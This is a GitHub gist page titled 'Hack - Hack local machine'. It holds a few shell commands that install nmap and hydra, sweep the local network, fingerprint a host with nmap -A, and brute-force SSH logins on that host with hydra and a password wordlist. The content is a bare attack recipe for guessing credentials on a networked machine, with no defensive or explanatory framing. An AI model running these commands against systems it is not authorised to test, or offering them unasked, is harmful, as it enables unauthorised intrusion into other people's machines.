Created
January 29, 2014 13:28
-
-
Save Yago/68b19da1fa4f54ede0a4 to your computer and use it in GitHub Desktop.
Hack - Hack local machine
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# install | |
$ brew install cmake | |
$ brew install libssh | |
$ brew install hydra | |
$ brew install nmap | |
$ ping 192.168.1.255 | |
$ nmap -A 192.168.0.8 | |
$ hydra -l User -P '/path/to/wordlist.txt' 192.168.0.8 ssh |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment